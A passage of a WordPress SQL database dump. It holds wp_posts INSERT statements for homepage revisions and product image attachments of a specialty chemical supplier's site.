animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="1px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="546"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 14:49:56', '2016-08-19 14:49:56', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (595, 1, '2016-08-19 14:57:11', '2016-08-19 14:57:11', '', 'krytox_grey', '', 'inherit', 'open', 'closed', '', 'krytox_grey', '', '', '2016-08-19 15:03:54', '2016-08-19 15:03:54', '', 64, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/krytox_grey.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (596, 1, '2016-08-19 15:03:11', '2016-08-19 15:03:11', '', 'hexion', '', 'inherit', 'open', 'closed', '', 'hexion', '', '', '2016-08-19 15:03:11', '2016-08-19 15:03:11', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/hexion.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (597, 1, '2016-08-19 15:08:20', '2016-08-19 15:08:20', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="1px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 15:08:20', '2016-08-19 15:08:20', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (598, 3, '2016-08-19 15:14:41', '2016-08-19 15:14:41', '', 'Vazo 52', '', 'inherit', 'open', 'closed', '', 'vazo-52-3', '', '', '2016-08-19 15:14:41', '2016-08-19 15:14:41', '', 568, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Vazo-52-1-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (599, 1, '2016-08-19 15:17:26', '2016-08-19 15:17:26', '', 'vertrel', '', 'inherit', 'open', 'closed', '', 'vertrel', '', '', '2016-08-19 15:17:37', '2016-08-19 15:17:37', '', 64, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/vertrel.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (601, 1, '2016-08-19 15:18:50', '2016-08-19 15:18:50', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="1px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="599"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 15:18:50', '2016-08-19 15:18:50', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (602, 1, '2016-08-19 15:22:43', '2016-08-19 15:22:43', '', 'vazo', '', 'inherit', 'open', 'closed', '', 'vazo-4', '', '', '2016-08-19 15:22:43', '2016-08-19 15:22:43', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/vazo-5.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (603, 1, '2016-08-19 15:23:38', '2016-08-19 15:23:38', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="1px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="599"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 15:23:38', '2016-08-19 15:23:38', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (604, 1, '2016-08-19 15:32:37', '2016-08-19 15:32:37', '', 'fluoroextreme', '', 'inherit', 'open', 'closed', '', 'fluoroextreme', '', '', '2016-08-19 15:32:37', '2016-08-19 15:32:37', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/fluoroextreme.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (605, 1, '2016-08-19 15:33:38', '2016-08-19 15:33:38', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release agents</h4>\r\n[button text="TELL ME MORE" link="introducing-releasys-our-newest-release-agent/" style="white alt-button"]\r\n\r\n[/ux_banner]\r\n\r\n[gap height="1px"]\r\n\r\n[row]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="595"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="596"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="599"]\r\n\r\n[/col]\r\n\r\n[col span="1/4"]\r\n\r\n[ux_image id="602"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/2"]\r\n\r\n[ux_image id="604"]\r\n\r\n[/col]\r\n\r\n[col span="1/2"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-19 15:33:38', '2016-08-19 15:33:38', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (606, 1, '2016-08-19 15:34:55', '2016-08-19 15:34:55', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="150px" text_color="light" text_width="60%" text_bg="#002c56" bg="#002c56"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n<h2 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h2>\r\n[button text="MORE" link="about" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="240px" bg="86" link="product-category/release-agents/" target="_self" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom" excerpt="false"]\r\n\r\n[button text="RELEASE AGENTS" link="product-category/release-agents/" style="primary"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" link="product-category/krytox-lubricants/" � animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX™&amp; LUBRICANTS" link="product-category/krytox-lubricants/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" link="product-category/solvents/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY PRODUCTS &amp; SOLVENTS" link="product-category/solvents/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" link="product-category/conformal-coatings/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="EPOXY &amp; CONFORMAL COATINGS" link="product-category/conformal-coatings/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="120px" bg="233" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICALCHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="270px" bg="91" link="product-category/vazo/" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO RADICAL INITIATORS" link="product-category/vazo/" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n[row]\r\n\r\n[col span="1/1"]\r\n\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[row]\r\n\r\n[col span="1/3" align="0"]\r\n\r\n<h3>Technical Support</h3>We are committed to providing our clients with superior customer service, delivery, and technical support.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Application Experts</h3>With over 50 years of knowledge &amp; experience,  Miller Stephenson\'s team of experts can help you find the solution to a successful application.\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Large Inventory</h3>We are committed to ensuring that our customers can count on us to provide swift delivery and fulfillment of their orders.\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" text_color="light" animated="rotateInUpLeft" text_width="70%" text_align="center" text_pos="center" parallax_text="0" effect="sparkle" hover="zoom"]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>ReleaSys&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new&nbsp;semi-permanent mold release 